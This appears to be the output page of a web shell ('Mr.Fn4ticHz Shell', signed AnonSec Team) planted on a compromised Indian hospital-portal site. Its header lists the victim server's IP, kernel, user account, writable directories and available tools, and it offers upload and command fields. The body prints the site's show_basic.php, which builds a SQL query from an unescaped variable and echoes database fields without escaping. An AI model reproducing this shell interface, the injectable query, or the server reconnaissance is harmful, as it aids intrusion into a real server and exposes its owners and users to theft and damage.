Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.191.157.197
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/www/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/www/login.easenup.in//show_basic.php
<?php
session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');
include 'menu.php';
?>
<?php 
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
		$sql ="SELECT * FROM hco WHERE adminid='$usertype'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
		    echo "

		    <div class='content-wrapper'>
    <!-- Content Header (Page header) -->
    <section class='content-header'>
    <div class='center'>
    <table  width='100%'>
 <fieldset><legend>Basic Profile</legend>
<span><a href='hospital_basic_edit.php'>Edit</a></span>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Organization Phone number: </td>
<td width='50%'>$rs[OrganizationPhonenumber]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Alternative Mobile number :  </td>
<td width='50%'>$rs[AlternativeMobilenumber]</td>
</tr>
<tr>
<td width='50%'> &nbsp;  &nbsp; &nbsp; &nbsp; Application type:  </td>
<td width='50%'>$rs[Applicationtype]</td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Street: </td>
<td width='50%'>$rs[Street]</td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Locality : </td>
<td width='50%'>$rs[Locality]</td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Tahsil : </td>
<td width='50%'>$rs[Tahsil] </td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; District :  </td>
<td width='50%'>$rs[District] </td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; State :  </td>
<td width='50%'>$rs[State] </td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Website : </td>
<td width='50%'>$rs[Website]  </td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Location of Hospital : </td>
<td width='50%'>$rs[LocationofHospital] </td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Head person name : </td>
<td width='50%'>$rs[Headpersonname] </td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Head person contact number : </td>
<td width='50%'>$rs[Headctnumber] </td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Other Location : </td>
<td width='50%'>$rs[addressofotherlocation] </td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Street  : </td>
<td width='50%'>$rs[other_Street] </td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Locality : </td>
<td width='50%'>$rs[other_Locality] </td>

</table>
</fieldset>

</div>
 ";
	  echo "</td></tr>";	}
		?>
		
		   <head>
               <style>
                     
       .center {
   border: 1px solid grey;
   text-align:;
}

h2 {
  color: #4287f5;
}
</style>
               
           </head>
    
		</html>

Anon7 - 2022
AnonSec Team